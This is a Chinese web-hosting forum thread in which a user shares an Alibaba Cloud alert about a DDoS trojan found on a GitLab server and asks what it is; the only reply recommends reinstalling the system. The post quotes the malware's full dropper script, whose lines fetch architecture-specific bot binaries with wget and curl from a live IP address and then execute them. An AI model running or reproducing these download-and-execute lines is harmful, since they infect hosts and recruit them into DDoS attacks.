全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1165|回复: 1

[不限流量] 收到了 阿里云安全事件告警 帮忙看看这是啥

[复制链接]
发表于 2022-6-6 11:31:53 | 显示全部楼层 |阅读模式


话说 这个ip怎么这么快啊
告警描述:检测模型发现您的服务器上运行了DDoS木马,DDoS木马是用于从被攻陷主机上接受指令,对黑客指定目标发起DDoS攻击的恶意程序。
异常事件详情
文件路径:/var/opt/gitlab/gitlab-workhorse/kk6 (deleted)

异常的脚本内容:
  1. #!/bin/bash
  2. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.x86;cat gang123isgodloluaintgettingthesebinslikedammwtf.x86 >3AvA;chmod +x *;./3AvA x86
  3. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mips;cat gang123isgodloluaintgettingthesebinslikedammwtf.mips >3AvA;chmod +x *;./3AvA mips
  4. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.mpsl;cat gang123isgodloluaintgettingthesebinslikedammwtf.mpsl >3AvA;chmod +x *;./3AvA mpsl
  5. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm4;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm4 >3AvA;chmod +x *;./3AvA arm4
  6. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm5;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm5 >3AvA;chmod +x *;./3AvA arm5
  7. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm6;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm6 >3AvA;chmod +x *;./3AvA arm6
  8. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.arm7;cat gang123isgodloluaintgettingthesebinslikedammwtf.arm7 >3AvA;chmod +x *;./3AvA arm7
  9. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.ppc;cat gang123isgodloluaintgettingthesebinslikedammwtf.ppc >3AvA;chmod +x *;./3AvA ppc
  10. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.m68k;cat gang123isgodloluaintgettingthesebinslikedammwtf.m68k >3AvA;chmod +x *;./3AvA m68k
  11. cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4; curl -O http://152.89.211.233/bns/gang123isgodloluaintgettingthesebinslikedammwtf.sh4;cat gang123isgodloluaintgettingthesebinslikedammwtf.sh4 >3AvA;chmod +x *;./3AvA sh4
复制代码
发表于 2022-6-6 15:18:22 | 显示全部楼层
重做系统就是了
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-11-26 09:36 , Processed in 0.059333 second(s), 8 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表